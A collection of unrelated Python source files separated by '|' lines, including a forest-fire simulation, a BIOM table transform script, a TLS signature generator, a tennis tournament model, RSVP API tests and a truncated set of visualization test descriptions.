xp += 1
if fire_fighters > FF_INFO[0]:
fire_fighters = FF_INFO[0]
fire_fighters_max = True
for x,y in Fire_Locations:
#FireFighters Here
if fire_fighters > 0:
pExtinguished = FF_INFO[-1][self.grid[x][y].name]
if uniform.rvs(scale = 1,size=1)[0] < pExtinguished:
self.grid[x][y].Extinguished()
axarr[x,y].cla()
axarr[x,y].imshow(water)
axarr[x,y].axis('off')
else:
self.distribution[self.grid[x][y].name] -= 1
self.distribution[0] += 1
self.grid[x][y].Burned()
axarr[x,y].cla()
axarr[x,y].imshow(images[0])
axarr[x,y].axis('off')
Spread_Locations.update(Forest.GetNeighbors(self.N,(x,y)))
fire_fighters -= 1
else:
self.distribution[self.grid[x][y].name] -= 1
self.distribution[0] += 1
self.grid[x][y].Burned()
axarr[x,y].cla()
axarr[x,y].imshow(images[0])
axarr[x,y].axis('off')
Spread_Locations.update(Forest.GetNeighbors(self.N,(x,y)))
Fire_Locations.clear()
for x,y in Spread_Locations:
if rand_intensity:
intensity = 1/uniform.rvs(scale = 2,size=1)[0]
else:
intensity = 1
yr = int(time/365)
day = time - 365*yr
W_ = self.WeatherFunc((x,y),day,yr)
self.grid[x][y].UpdateWeather(W_[0],W_[1])
Probibility_of_Burn = self.grid[x][y].Pburn(self.weights,intensity)
if uniform.rvs(scale = 1,size=1)[0] < Probibility_of_Burn:
#Shits On Fire Yo
Fire_Locations.append((x,y))
self.grid[x][y].SetOnFire()
axarr[x,y].cla()
axarr[x,y].imshow(fire)
axarr[x,y].axis('off')
time += 1
str_time = '0'*(4-len(str(time)))+str(time)
out_file = outFile + str_time + ".png"
plt.savefig(out_file)
if len(Fire_Locations) == 0:
self.onFIRE = False
#Create txt file for gif command
fileList = glob.glob('*.png') #star grabs everything,
fileList.sort()
#writes txt file
file = open('FileList.txt', 'w')
for item in fileList:
file.write("%s\n" % item)
file.close()
os.system('convert -delay 75 @FileList.txt ' + files[-1] + '.gif')
os.system('del FileList.txt')
os.system('del *.png')
os.chdir('../..')
def Display(self,files):
images = dict()
for key, value in files[0].items():
images[key] = mpimg.imread(value)
fire = mpimg.imread(files[1])
water = mpimg.imread(files[2])
fig, axarr = plt.subplots(self.N, self.N)
fig.set_size_inches(self.N*1.5, self.N)
plt.subplots_adjust(wspace=0, hspace=0)
for x in range(self.N):
for y in range(self.N):
if self.grid[x][y].burning:
axarr[x,y].imshow(fire)
axarr[x,y].axis('off')
elif self.grid[x][y].putout:
axarr[x,y].imshow(water)
axarr[x,y].axis('off')
else:
axarr[x,y].imshow(images[self.grid[x][y].fuel])
axarr[x,y].axis('off')
plt.savefig(files[-1])
plt.clf()
def TimeSeries(self,WildFireINFO,yrs=50):
data = dict()
data[0] = self.GetDistribution()
n = 1
for yr in range(1,yrs+1):
#r_nums = uniform.rvs(scale = 1,size=365)
if yr == 10*n:#min(r_nums) < self.WildFireProb(day,yr):
intial = (random.randint(0,self.N-1),random.randint(0,self.N-1))
self.WildFire(WildFireINFO[0],intial,(0,0),WildFireINFO[1])
print(self.distribution)
n+=1
data[yr] = self.GetDistribution()
self.Evolve()
return data
def PlotDistOverTime(self,data,outfile):
#Make List arrays
species = dict()
for name in self.names:
species[name] = []
time = []
for key, value in data.items():
time.append(key)
for key, value in value.items():
species[key].append(value)
sns.set()
fig, ax = plt.subplots(1)
for key in species:
#if not key == "Burned":
ax.plot(time,species[key],linewidth=2.0,label=key)
fig.set_size_inches(16, 12)
plt.axis([0, time[-1], 0, 1.0])
plt.xlabel('Time (Years)')
plt.ylabel('Fraction of Population')
plt.legend()
plt.savefig(outfile+".png")
if __name__ == "__main__":
burned = ("Burned",0,0)
shrubland = ("Shrubland",500,32.123751)
decidiuous = ("Deciduous",500,8.648680706)
pine = ("Pine",500,12.355258)
Transistion_forest = ("Transistion",500,9.884206521)
oak = ("Oak",500,8.648680706)
IntialDist = [burned, shrubland, decidiuous, pine, Transistion_forest, oak]
N = 50
wits = [.05,0,0,0]
test = Forest(N,IntialDist,wits)
ff_prob = dict()
for name in test.names:
ff_prob[name] = 1.0/3
FF_info = [25,[0,.1,.01,.001],ff_prob]
WFINFO = [FF_info,True]
data = test.TimeSeries(WFINFO,500)
outfile = "TimeSeries10FIRES100yrs"
test.PlotDistOverTime(data,outfile)
# burn = []
# for i in range(100):
# init_ = (random.randint(0,N-1),random.randint(0,N-1))
# test.WildFire(FF_info,intial=init_,rand_intensity=True)
# burn.append(test.distribution["Burned"]/2500)
# test = Forest(N,IntialDist,wits)
# print(i)
#
#
# avg = sum(burn)/len(burn)
# std_ = np.std(np.asanyarray(burn))
#
# print(avg," : ",std_)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Apply various transforms to data in a BIOM-format
table.
"""
from __future__ import absolute_import, division, print_function
# standard library imports
import argparse
from gzip import open as gzip_open
# 3rd party imports
import biom
import numpy as np
try:
import h5py
HAVE_H5PY = True
except ImportError:
HAVE_H5PY = False
# local imports
import phylotoast
def write_biom(biom_tbl, output_fp, fmt="hdf5", gzip=False):
"""
Write the BIOM table to a file.
:type biom_tbl: biom.table.Table
:param biom_tbl: A BIOM table containing the per-sample OTU counts and metadata
to be written out to file.
:type output_fp str
:param output_fp: Path to the BIOM-format file that will be written.
:type fmt: str
:param fmt: One of: hdf5, json, tsv. The BIOM version the table will be
output (2.x, 1.0, 'classic').
"""
opener = open
mode = 'w'
if gzip and fmt != "hdf5":
if not output_fp.endswith(".gz"):
output_fp += ".gz"
opener = gzip_open
mode = 'wt'
# HDF5 BIOM files are gzipped by default
if fmt == "hdf5":
opener = h5py.File
gen_str = "PhyloToAST v{} (phylotoast.org)".format(phylotoast.__version__)
biom_tbl.generated_by = gen_str
with opener(output_fp, mode) as biom_f:
if fmt == "json":
biom_tbl.to_json(biom_tbl.generated_by, direct_io=biom_f)
elif fmt == "tsv":
biom_f.write(biom_tbl.to_tsv())
else:
biom_tbl.to_hdf5(biom_f, biom_tbl.generated_by)
return output_fp
def relative_abd(biom_tbl):
return biom_tbl.norm(inplace=False)
def log10(biom_tbl):
log10_tfm = lambda data, id_, md: np.nan_to_num(np.log10(data))
return biom_tbl.transform(log10_tfm, inplace=False)
def relative_abd_log10(biom_tbl):
tbl_norm = relative_abd(biom_tbl)
return log10(tbl_norm)
def arcsin_sqrt(biom_tbl):
"""
Applies the arcsine square root transform to the
given BIOM-format table
"""
arcsint = lambda data, id_, md: np.arcsin(np.sqrt(data))
tbl_relabd = relative_abd(biom_tbl)
tbl_asin = tbl_relabd.transform(arcsint, inplace=False)
return tbl_asin
transforms = {"arcsin_sqrt": arcsin_sqrt,
"ra": relative_abd,
"log10": log10,
"ra_log10": relative_abd_log10}
def handle_program_options():
"""Parses the given options passed in at the command line."""
parser = argparse.ArgumentParser(description="This script applies various"
"transforms to the data in a given "
"BIOM-format table and outputs a new"
"BIOM table with the transformed data.")
parser.add_argument("-i", "--biom_table_fp", required=True,
help="Path to the input BIOM-format table. [REQUIRED]")
parser.add_argument("-t", "--transform", default="arcsin_sqrt",
choices=transforms.keys(),
help="The transform to apply to the data. Default: "
"arcsine square root.")
parser.add_argument('--fmt', default="hdf5",
choices=["hdf5", "json", "tsv"],
help="Set the output format of the BIOM table.\
Default is HDF5.")
parser.add_argument('--gzip', action='store_true',
help="Compress the output BIOM table with gzip.\
HDF5 BIOM (v2.x) files are internally\
compressed by default, so this option\
is not needed when specifying --fmt hdf5.")
parser.add_argument("-o", "--output_fp", required=True,
help="Output path for the transformed BIOM table."
"[REQUIRED]")
parser.add_argument('-v', '--verbose', action='store_true')
return parser.parse_args()
def main():
args = handle_program_options()
biom_tbl = biom.load_table(args.biom_table_fp)
tbl_tform = transforms[args.transform](biom_tbl)
write_biom(tbl_tform, args.output_fp, fmt=args.fmt, gzip=args.gzip)
if args.verbose:
print("Transformed table written to: {}".format(args.output_fp))
if __name__ == '__main__':
main()
|
import base64
import zlib
import json
import time
# python ecdsa 开发库请到 https://github.com/warner/python-ecdsa
# 或者 tls 技术支持分享的链接 http://share.weiyun.com/24b674bced4f84ecbbe6a7945738b9f4
# 下载,下载完毕之后进入其根目录,运行下面的命令进行安装,
# python setup.py install
# 下面是转换私钥格式命令
# openssl ec -outform PEM -inform PEM -in private.pem -out private_ec.pem
# -in 后面的传入下载的私钥 -out 后面是转换后的私钥文件
from ecdsa import SigningKey,util
import hashlib
# 这里请填写应用自己的私钥
ecdsa_pri_key = """
your_private_key
"""
def base64_encode_url(data):
base64_data = base64.b64encode(data)
# type(base64_data) ->bytes
base64_data = bytes.decode(base64_data).replace('+', '*')
base64_data = base64_data.replace('/', '-')
base64_data = base64_data.replace('=', '_')
return base64_data
def base64_decode_url(base64_data):
base64_data = base64_data.replace('*', '+')
base64_data = base64_data.replace('-', '/')
base64_data = base64_data.replace('_', '=')
raw_data = base64.b64decode(base64_data)
return raw_data
class TLSSigAPI:
""""""
__acctype = 0
__identifier = ""
__appid3rd = ""
__sdkappid = 0
__version = 20190114
__expire = 3600*24*30 # 默认一个月,需要调整请自行修改
__pri_key = ""
__pub_key = ""
_err_msg = "ok"
def __get_pri_key(self):
return self.__pri_key_loaded
def __init__(self, sdkappid, pri_key):
self.__sdkappid = sdkappid
self.__pri_key = pri_key
self.__pri_key_loaded = SigningKey.from_pem(self.__pri_key)
def __create_dict(self):
m = {}
m["TLS.account_type"] = "%d" % self.__acctype
m["TLS.identifier"] = "%s" % self.__identifier
m["TLS.appid_at_3rd"] = "%s" % self.__appid3rd
m["TLS.sdk_appid"] = "%d" % self.__sdkappid
m["TLS.expire_after"] = "%d" % self.__expire
m["TLS.version"] = "%d" % self.__version
m["TLS.time"] = "%d" % time.time()
return m
def __encode_to_fix_str(self, m):
fix_str = "TLS.appid_at_3rd:" + m["TLS.appid_at_3rd"] + "\n" \
+ "TLS.account_type:" + m["TLS.account_type"] + "\n" \
+ "TLS.identifier:" + m["TLS.identifier"] + "\n" \
+ "TLS.sdk_appid:" + m["TLS.sdk_appid"] + "\n" \
+ "TLS.time:" + m["TLS.time"] + "\n" \
+ "TLS.expire_after:" + m["TLS.expire_after"] + "\n"
return fix_str
def tls_gen_sig(self, identifier):
self.__identifier = identifier
m = self.__create_dict()
fix_str = self.__encode_to_fix_str(m)
pk_loaded = self.__get_pri_key()
sig_field = pk_loaded.sign(fix_str.encode(), hashfunc=hashlib.sha256, sigencode=util.sigencode_der)
sig_field_base64 = base64.b64encode(sig_field)
s2 = bytes.decode(sig_field_base64)
m["TLS.sig"] = s2
json_str = json.dumps(m)
# type(json_str) -> str
sig_cmpressed = zlib.compress(json_str.encode()) # json_str bytes-like -> bytes
# type(sig_cmpressed) ->bytes
base64_sig = base64_encode_url(sig_cmpressed) # sig_cmpressed bytes-like -> bytes
return base64_sig
def main():
api = TLSSigAPI(1400001052, ecdsa_pri_key)
sig = api.tls_gen_sig("xiaojun")
print sig
if __name__ == "__main__":
main()
|
from abc import ABC, abstractmethod
from xquant.portfolio import Portfolio
class Strategy(ABC):
'''
Strategy
--------
An abstract base class serves as the parent class of the user's strategy.
The user must create a child class and implement the stock_selection method.
'''
def __init__(self, strategy_name) -> None:
self.strategy_name = strategy_name
@abstractmethod
def stock_selection(self, funds, date) -> Portfolio:
'''selects a portfolio of stocks and shares from the stock selection universe'''
pass
|
from os import path
import yaml
from so_crawl.crawl import fetch_snippets
def _get_name_from_question_link(full_link):
# First, throw away the anchor part of the link...
anchor_pos = full_link.find('#')
if anchor_pos >= 0:
full_link = full_link[:anchor_pos]
# Now, get the final part of link, and convert to title
link = path.basename(full_link)
parts = link.split('-')
return ' '.join([
part.title() for part in parts
])
def _get_filepath_for_snippet(snippet, path_to_dir):
# First, throw away the anchor part of the link...
anchor_pos = snippet.url.find('#')
if anchor_pos >= 0:
full_link = snippet.url[:anchor_pos]
else:
full_link = snippet.url
# Now, get the final part of link, and use as filename
# To be safe, make sure to use utf8 for filepath compatibility
link = path.basename(full_link).encode('utf-8')
filename = '{}.p2'.format(link)
filepath = path.join(path_to_dir, filename)
# Lets make sure we aren't overwriting an existing file
# To be safe, lets bound the number of attempts to a reasonable number like 100
# (Bonus: This also makes the code more func-y, without loop counters)
for i in xrange(100):
if not path.exists(filepath):
break
filename = '{}({})'.format(link, i + 1)
filepath = path.join(path_to_dir, filename)
# By design, if 100 attempts fail to find a unique filepath,
# the 100th duplicate is overwritten...
return filepath
def _snippet_to_source(snippet):
title = _get_name_from_question_link(snippet.url)
meta = {
'name': title,
'language': 'py',
'created_on': snippet.retrieved_at,
'created_by': snippet.author,
'retrieved_from': snippet.url,
'references': [snippet.extra_url]
}
yaml_meta = yaml.dump(meta, default_flow_style=False)
return u'---\n{}...\n{}'.format(yaml_meta, snippet.code)
def pull_snippets(num_snippets, start_time, end_time, extra_tags, save_to_dir):
snippets = fetch_snippets(num_snippets, start_time, end_time, extra_tags)
for snippet in snippets:
full_source = _snippet_to_source(snippet)
output_filepath = _get_filepath_for_snippet(snippet, save_to_dir)
with open(output_filepath, 'w') as output_file:
# Encode Late: Convert string to utf8 just before writing
output_file.write(full_source.encode('utf-8'))
return len(snippets)
|
class ArbolBinario:
def __init__(self, valor, izquierda=None, derecha=None):
self.__valor = valor
self.__izquierda = izquierda
self.__derecha = derecha
def insertar_izquierda(self, valor):
self.__izquierda = ArbolBinario(valor)
return self.__izquierda
def insertar_derecha(self, valor):
self.__derecha = ArbolBinario(valor)
return self.__derecha
def devolver_valor(self):
return self.__valor
def imprimir(self, nivel=0):
espacios = nivel * ' '
print('%s%d' % (espacios, self.__valor))
if self.__izquierda:
self.__izquierda.imprimir(nivel + 1)
if self.__derecha:
self.__derecha.imprimir(nivel + 1)
return None
def fibonacci(termino):
if termino == 0:
return termino
elif termino == 1:
return termino
else:
return fibonacci(termino - 2) + fibonacci(termino - 1)
def arbol_fibonacci(termino):
if termino == 0:
return ArbolBinario(termino)
elif termino == 1:
return ArbolBinario(termino)
else:
izquierda = arbol_fibonacci(termino - 2)
derecha = arbol_fibonacci(termino - 1)
valor = izquierda.devolver_valor() + derecha.devolver_valor()
arbol = ArbolBinario(valor, izquierda, derecha)
return arbol
if __name__ == '__main__':
n = int(input())
while n >= 0:
arbol = arbol_fibonacci(n)
arbol.imprimir()
print('====')
n = int(input())
|
import random
from geopandas import GeoDataFrame, GeoSeries
from shapely.geometry import Point, LineString, Polygon, MultiPolygon
import numpy as np
class Bench:
param_names = ['geom_type']
params = [('Point', 'LineString', 'Polygon', 'MultiPolygon', 'mixed')]
def setup(self, geom_type):
if geom_type == 'Point':
geoms = GeoSeries([Point(i, i) for i in range(1000)])
elif geom_type == 'LineString':
geoms = GeoSeries([LineString([(random.random(), random.random())
for _ in range(5)])
for _ in range(100)])
elif geom_type == 'Polygon':
geoms = GeoSeries([Polygon([(random.random(), random.random())
for _ in range(3)])
for _ in range(100)])
elif geom_type == 'MultiPolygon':
geoms = GeoSeries(
[MultiPolygon([Polygon([(random.random(), random.random())
for _ in range(3)])
for _ in range(3)])
for _ in range(20)])
elif geom_type == 'mixed':
g1 = GeoSeries([Point(i, i) for i in range(100)])
g2 = GeoSeries([LineString([(random.random(), random.random())
for _ in range(5)])
for _ in range(100)])
g3 = GeoSeries([Polygon([(random.random(), random.random())
for _ in range(3)])
for _ in range(100)])
geoms = g1
geoms.iloc[np.random.randint(0, 100, 50)] = g2
geoms.iloc[np.random.randint(0, 100, 33)] = g3
print(geoms.geom_type.value_counts())
df = GeoDataFrame({'geometry': geoms,
'values': np.random.randn(len(geoms))})
self.geoms = geoms
self.df = df
def time_plot_series(self, *args):
self.geoms.plot()
def time_plot_values(self, *args):
self.df.plot(column='values')
|
# coding=UTF-8
# vim: set fileencoding=UTF-8 :
'''
DESCRIPTION
TennisModel is sample module of classes for simulating tennis tournaments.
Contains business logic of tennis Single Elimination Tournaments.
'''
import random
import model.tournaments as tmt
def is_in_interval(value):
'''Helper function to test, whether value is in ou interval'''
assert isinstance(value, int)
if 0 <= value < 10:
return True
return False
class TennisPlayer(tmt.Competitor):
'''
Sample implementation of tennis player
'''
def __init__(self, name='', ability=0, fh=0, bh=0):
'''
Constructor
'''
super().__init__(name)
self.ability = ability
self.forehand = fh
self.backhend = bh
def __str__(self):
return "TennisPlayer:" + self.name
@property
def ability(self):
'''Tennis player ability from 0 to 9. More is better.'''
return self.__ability
@ability.setter
def ability(self, value):
assert isinstance(value, int) and is_in_interval(value), \
'Value must be int between 0 and 9.'
self.__ability = value
@property
def forehand(self):
'''Tennis player property for forehand'''
return self.__forehand
@forehand.setter
def forehand(self, value):
assert isinstance(value, int) and is_in_interval(value), \
'Forehand must be int between 0-9.'
self.__forehand = value
@property
def backhend(self):
'''Tennis player property for backhand'''
return self.__backhend
@backhend.setter
def backhend(self, value):
assert isinstance(value, int) and is_in_interval(value), \
'Backhand must be int between 0-9.'
self.__backhend = value
class TennisGameScore(tmt.Score):
'''
Sample implementation of tennis score for a game in one set.
'''
def evaluate_score(self):
first = max((self.score_competitor1, self.score_competitor2))
second = min((self.score_competitor1, self.score_competitor2))
if first < 6:
# no one is set winner
return 0
elif (first >= 6 and first - second >= 2) or \
(first == 7 and second == 6):
# somebody wins the set
if self.score_competitor1 > self.score_competitor2:
return 1
elif self.score_competitor1 < self.score_competitor2:
return -1
else:
return 0
class TennisMatchScore(tmt.Score):
'''
Sample representation of tennis match score with individual sets scores.
'''
def __init__(self, score1=None, score2=None):
super().__init__(score1, score2)
self.set_scores = []
def add_set_score(self, set_score):
assert isinstance(set_score, TennisGameScore)
self.set_scores.append(set_score)
class TennisMatch(tmt.Match):
'''
Custom implementation of tennis match
'''
def __play_game(self):
'''
Evaluates duel between competitors for game in set - who wins the game
@return: 1 if game winner is home player, 2 if winner is away player
'''
while True:
home = random.randrange(1, 6) \
+ self.competitor1.ability \
+ self.competitor1.forehand \
+ self.competitor1.backhend
away = random.randrange(1, 6) \
+ self.competitor2.ability \
+ self.competitor2.forehand \
+ self.competitor2.backhend
if home != away:
break
if home > away:
return 1
else:
return 2
def play_match(self, sets=3):
'''
Custom implementation of tennis match
@param sets: number of sets to win a match
'''
if self.info is None:
raise tmt.MatchInfoError('Pointer is not set to MatchInfo object.')
# for every set:
# for every game evaluate players properties and change set score
# after every set change score object for sets
match_score = TennisMatchScore(0, 0)
while True:
set_score = TennisGameScore(0, 0)
while True:
game_winner = self.__play_game()
if game_winner == 1:
set_score.add_home_score(1)
elif game_winner == 2:
set_score.add_away_score(1)
state = set_score.evaluate_score()
if state != 0:
if state == 1:
match_score.add_home_score(1)
elif state == -1:
match_score.add_away_score(1)
match_score.add_set_score(set_score)
break
if match_score.get_max_score() == sets:
# match ended
self.info.score = match_score
self.info.evaluate(self.competitor1, self.competitor2)
break
class TennisSET(tmt.SingleEliminationTournament):
'''
Custom implementation for Tennis example
'''
def _init_round_list(self, i):
return [TennisMatch(info=tmt.MatchInfo()) for _ in range(2 ** i)]
|
"""
Utility methods for use during training & evaluation
"""
def load_dataset(dataset_file, narrative_token, dialog_token, eos_token):
sequence = []
with open(dataset_file, "r", encoding="utf-8") as f:
for line in f:
line = line.strip()
if line == "":
if len(sequence) > 0:
example = "".join(sequence)
sequence.clear()
yield example
else:
prefix_token = narrative_token if line[:3] == "[N]" else dialog_token
sequence.append(prefix_token + line[5:] + eos_token)
|
"""Test rsvp module"""
from app.tests.basetest import BaseTest
class RsvpMeetup(BaseTest):
"""Rsvps tests class"""
def test_if_no_data(self):
"""Tests if no data is provided in rsvps creation"""
respon = self.client.post(
"/api/v1/meetups/1/rsvps")
self.assertEqual(respon.status_code, 400)
self.assertIn('Please provide a json data',
str(respon.data))
def test_if_fields_missing(self):
"""Tests if some fields are missing in rsvps creation"""
respon = self.client.post(
"/api/v1/meetups/1/rsvps", json=self.rsvp, content_type='application/json')
self.assertEqual(respon.status_code, 400)
self.assertIn('Some fields are missing',
str(respon.data))
def test_rsvps_creation(self):
"""tests if rsvps can be posted"""
self.client.post("/api/v1/user/register", json=self.new_user19, content_type='application/json')
self.client.post(
"/api/v1/meetups", json=self.meetup, content_type='application/json')
respon = self.client.post(
"/api/v1/meetups/1/rsvps", json=self.rsvp1, content_type='application/json')
self.assertEqual(respon.status_code, 201)
self.assertIn('Rsvps successfully created',
str(respon.data))
def test_if_user_exists(self):
"""tests if user exists in rsvps creation"""
respon = self.client.post(
"/api/v1/meetups/3/rsvps", json=self.rsvp2, content_type='application/json')
self.assertEqual(respon.status_code, 404)
self.assertIn('That user doesnt exist, plz create a user',
str(respon.data))
def test_if_meetup_exists(self):
"""tests if meetup exists in rsvps creation"""
self.client.post("/api/v1/user/register", json=self.new_user19, content_type='application/json')
respon = self.client.post(
"/api/v1/meetups/10/rsvps", json=self.rsvp3, content_type='application/json')
self.assertEqual(respon.status_code, 404)
self.assertIn('That meetup doesnt exist',
str(respon.data))
def test_data_format_validate_rsvps(self):
"""tests the data format in rsvps"""
respon = self.client.post(
"/api/v1/meetups/1/rsvps", json=self.rsvp4, content_type='application/json')
self.assertEqual(respon.status_code, 400)
self.assertIn("response should not be provided in numbers",
str(respon.data))
def test_empty_space_rsvps(self):
"""tests empty space in rsvps"""
respon = self.client.post(
"/api/v1/meetups/1/rsvps", json=self.rsvp5, content_type='application/json')
self.assertEqual(respon.status_code, 400)
self.assertIn("response should not be empty",
str(respon.data))
|
#tests models
tests_model = {
'RGraph': [
{
'Title': 'Tree Animation',
'Description':
"""
A static JSON Tree structure is used as input for this visualization.<br /><br />
<b>Click</b> on a node to move the tree and center that node.<br /><br />
The centered node's children are displayed in a relations list in the right column.<br /><br />
<b>Use the mouse wheel</b> to zoom and <b>drag and drop the canvas</b> to pan.
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Test removing nodes.',
'Description':
"""
Testing the RGraph with a simple static JSON structure and removing a subtree.
The Subtree having "Matt Cameron" as root node should be removed with an animation
customized by the form parameters when clicking on the "remove" button.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['excanvas.js']
},
{
'Title': 'Test removing edges.',
'Description':
"""
Testing the RGraph with a simple static JSON structure and removing edges.
The edges Matt Cameron-Pearl Jam and Matt Cameron-Red Kross should be removed with
an animation when clicking in the "remove" button.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['excanvas.js']
},
{
'Title': 'Test Sum.',
'Description':
"""
Testing the RGraph with a simple static JSON structure and adding a subgraph.
Clicking on the sum button should add a subgraph as subtree of Pearl-Jam while performing
a fade-in animation.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test Morph.',
'Description':
"""
Testing the RGraph with a simple static JSON structure and morphing the structure to a graph.
Clicking on the morph button should transform the current graph into another graph, performing
fade-in-out animations.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Weighted Graph Animation',
'Description':
"""
A static JSON graph structure is used for this animation.<br /><br />
For each JSON node/edge the properties prefixed with the dollar sign ($) set the type of node/edge to be plotted, its style and its dimensions.<br /><br />
Line weights are added programmatically, <em>onBeforePlotLine</em>.<br /><br />
An <b>Elastic</b> transition is used instead of the linear transition for the animation.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Test with node styles and edge styles.',
'Description':
"""
Testing the RGraph with a simple static JSON structure.
You can choose different node styles and edge styles that should be globally applied to the vis.
Also, you can choose the random option, that sets random node and edges configuration. It overrides global configurations.
Default values are none, that means that neither nodes nor edges are drawn by default.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['excanvas.js']
},
{
'Title': 'Graph Operations',
'Description':
"""
You can do the following operations with the RGraph<br /><br />
1.- Removing subtrees or nodes<br /><br />
2.- Removing edges<br /><br />
3.- Adding another graph, also called sum<br /><br />
4.- Morphing (or transforming) the graph into another one<br />
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Node Events',
'Description':
"""
This example shows how to add node events to the visualization.<br /><br />
This example uses native canvas text for drawing the labels.<br /><br />
<b>Drag and drop</b> nodes around.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Node Events',
'Description':
"""
Testing new Node Event system.
Triggered registered events should be logged in FFs console.
""",
'Extras': ['excanvas.js'],
'Example':False
}
],
'Hypertree': [
{
'Title': 'Tree Animation',
'Description':
"""
A static JSON Tree structure is used as input for this animation.<br /><br />
Clicking on a node should move the tree and center that node.<br /><br />
The centered node's children are displayed in a relations list in the right column.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Test with single node.',
'Description':
"""
Loads a single node JSON dataset to the Hypertree.
""",
'Extras': ['excanvas.js']
},
{
'Title': 'Test removing nodes.',
'Description':
"""
Testing the Hypertree with a simple static JSON structure and removing a subtree.
The Subtree having "Matt Cameron" as root node should be removed with an animation
customized by the form parameters when clicking on the "remove" button.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['excanvas.js']
},
{
'Title': 'Test removing edges.',
'Description':
"""
Testing the Hypertree with a simple static JSON structure and removing edges.
The edges Matt Cameron-Pearl Jam and Matt Cameron-Red Kross should be removed with
an animation when clicking in the "remove" button.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['excanvas.js']
},
{
'Title': 'Test Sum.',
'Description':
"""
Testing the Hypertree with a simple static JSON structure and adding a subgraph.
Clicking on the sum button should add a subgraph as subtree of Pearl-Jam while performing
a fade-in animation.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test Morph.',
'Description':
"""
Testing the Hypertree with a simple static JSON structure and morphing the structure to a graph.
Clicking on the morph button should transform the current graph into another graph, performing
fade-in-out animations.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Weighted Graph Animation',
'Description':
"""
A static JSON graph structure is used for this animation.<br /><br />
For each JSON node the "$type" and "$dim" parameters set the type of node to be plotted and its dimensions.<br /><br />
Line weights are added programmatically, <em>onBeforePlotLine</em>.<br /><br />
A <b>Back</b> transition is used instead of the linear transition for the animation.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Test with not weighted random generated tree.',
'Description':
"""
Just plotting a random not weighted Hypertree.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test with weighted random generated tree.',
'Description':
"""
Just plotting a random weighted Hypertree.
Nodes diameters must vary.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test with custom nodes and edges.',
'Description':
"""
Testing Hypertree with custom nodes and edges.
The user can select custom nodes (circle, square, etc). and
custom edges from the form.
He can also choose different animation options and easings.
This test can be improved, for example by changing the color or
overriding each node's style differently.
""",
'Extras': ['excanvas.js']
},
{
'Title': 'Graph Operations',
'Description':
"""
You can do the following operations with the Hypertree<br /><br />
1.- Removing subtrees or nodes<br /><br />
2.- Removing edges<br /><br />
3.- Adding another graph, also called sum<br /><br />
4.- Morphing (or transforming) the graph into another one<br />
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Drag Tree',
'Description':
"""
""",
'Extras': ['excanvas.js'],
},
],
'Spacetree': [
{
'Title': 'Test the Spacetree with an infinite client-side generator.',
'Description':
"""
Testing the Spacetree with a client-side generator that returns a Tree of level = 3
when the controller request method is called.<br>
This should lead to an infinite Spacetree.<br>
Also, the edges should have arrow as style.<br>
The nodes belonging in the path between the clicked node and the root node are selected with a
different color.<br>
Clicking on a node should set focus to that node.<br>
This test uses the generator.js file to create random generated trees.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test adding a subtree',
'Description':
"""
Loads a static Spacetree and should add a subtree when clicking on the add button.<br>
You can change the parameters for adding the subtree in the form.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test removing a subtree.',
'Description':
"""
Loads a static Spacetree and should remove a subtree when clicking on the remove button.<br>
You can change the parameters for removing the subtree in the form.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test unbalanced tree.',
'Description':
"""
Tests the Spacetree layout algorithm with an unbalanced tree. <br>
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test Different node sizes',
'Description':
"""
Testing a static Spacetree with rectangle nodes with different widths and heights.<br>
You can also click on a node's name in the list to add focus to that node.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test Node types, Edge types, Animation types.',
'Description':
"""
Tests a static Spacetree with different node, edge and animation types that you can choose from
a form.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Tree Animation',
'Description':
"""
A static JSON Tree structure is used as input for this animation.<br /><br />
<b>Click</b> on a node to select it.<br /><br />
You can <b>select the tree orientation</b> by changing the select box in the right column.<br /><br />
You can <b>change the selection mode</b> from <em>Normal</em> selection (i.e. center the selected node) to
<em>Set as Root</em>.<br /><br />
<b>Drag and Drop the canvas</b> to do some panning.<br /><br />
Leaves color depend on the number of children they actually have.
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'SpaceTree with on-demand nodes',
'Description':
"""
This example shows how you can use the <b>request</b> controller method to create a SpaceTree with <b>on demand</b> nodes<br /><br />
The basic JSON Tree structure is cloned and appended on demand on each node to create an <b>infinite large SpaceTree</b><br /><br />
You can select the <b>tree orientation</b> by changing the select box in the right column.
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Add/Remove Subtrees',
'Description':
"""
This example shows how to add/remove subtrees with the SpaceTree.<br /><br />
<b>Add</b> a subtree by clicking on the <em>Add</em> button located in the right column.<br /><br />
<b>Remove</b> a subtree by clicking on a red colored node
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'MultiTree',
'Description':
"""
A static JSON Tree structure is used as input for this animation.<br /><br />
By setting the specific orientation for nodes we can create a multitree structure.<br /><br />
